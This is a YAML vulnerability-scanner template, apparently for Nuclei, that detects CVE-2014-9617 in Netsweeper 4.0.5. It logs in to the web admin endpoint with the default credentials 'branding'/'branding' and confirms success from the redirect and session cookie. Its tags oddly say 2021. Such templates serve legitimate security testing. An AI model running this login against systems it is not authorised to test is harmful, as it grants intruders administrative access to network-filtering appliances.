31 lines
848 B
YAML
31 lines
848 B
YAML
id: CVE-2014-9617
|
|
|
|
info:
|
|
name: Netsweeper 4.0.5 - Default Weak Account
|
|
author: daffainfo
|
|
severity: medium
|
|
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
|
tags: cve,cve2021,netsweeper
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /webadmin/auth/verification.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
|
|
login=branding&password=branding&Submit=Login
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 302
|
|
- type: word
|
|
words:
|
|
- 'Location: ../common/'
|
|
- 'Set-Cookie: webadminU='
|
|
part: header
|
|
condition: and |